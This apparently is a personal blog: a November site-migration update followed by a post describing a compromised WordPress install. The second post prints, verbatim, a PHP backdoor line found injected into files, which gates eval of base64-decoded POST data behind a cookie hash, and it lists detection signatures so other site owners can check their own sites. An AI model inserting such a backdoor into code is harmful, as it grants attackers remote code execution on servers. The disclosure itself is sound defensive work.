Revelations for November from Apokalypse

A few weeks back I remarked that there were two surprises I wanted to spring on you. Unfortunately, the recent chaos postponed the work involved, but I’ve been able to continue them now that things have settled down.

One is an upgrade of the site. The website software is seriously out of date. I’ve noticed that searches no longer return search info for new content. Also, it’s currently on an account which doesn’t handle quite so much bandwidth…nor disk space. So tonight I’ll be taking the site down while I transfer the data to the other site. I’ve got the updated software on the new server, and I’ve practiced transferring the info. Here’s hoping that it goes through in the shortest possible time and without unexpected challenges.

The other is a long-standing surprise that I’ll be able to announce after the site has extra capacity.

I had wanted to get these both out of the way so I could participate in the IronCoder contest for Mac developers, which was stretched out to a whole week! A whole week, and I still wasn’t able to participate! Oh well. I’ll still attempt to publish what would’ve been my entry in a week’s time. Of course, that means I’ll have to do my development in Leopard, using Xcode3.

Perhaps I should take a month to finish it.

Website was Down Due to Compromised WordPress System

If you attempted to access the site for the past 24+ hours I apologize for the prolonged downtime. I upgraded the WordPress system the blog runs on (complete with fail, and no thanks to the WordPress community in #wordpress for their non-help — I definitely will switch the blog to another system after 1.7’s release, and recommend prospective users to stay away from them and their system), and found compromised files throughout the system.

I believe I have corrected/removed the backdoor mechanisms which spammers have been using against the site, but there’s no evidence that the wacky WordPress system the site is now running on doesn’t have other compromised files, as well as the security holes through which the crackers originally got in.

Several compromised files had this line inserted at the beginning,

<?php if(md5($_COOKIE['_wp_debugger'])==”5fd808ac028e5197dd69318e32407eb7″){ eval(base64_decode($_POST['file'])); exit; } ?>

Others were disguised as image files, with file extensions of “pngg” and “jpgg”, and beginning with “

If you want to check your site for similarly compromised files and backdoors, search through your site code for signatures such as “qwerty”, “4008deadb16536f48b84fdc70f194dac”, “find suid files”, “_wp_debugger”, “5fd808ac028e5197dd69318e32407eb7″. The signatures are sure to change, as they’re used to activate the backdoor scripts, but at least you have a way to check current installations for these same spammers.

All in all, an unhealthy state of affairs for the Content Management System (CMS) industry. The market is still up for grabs.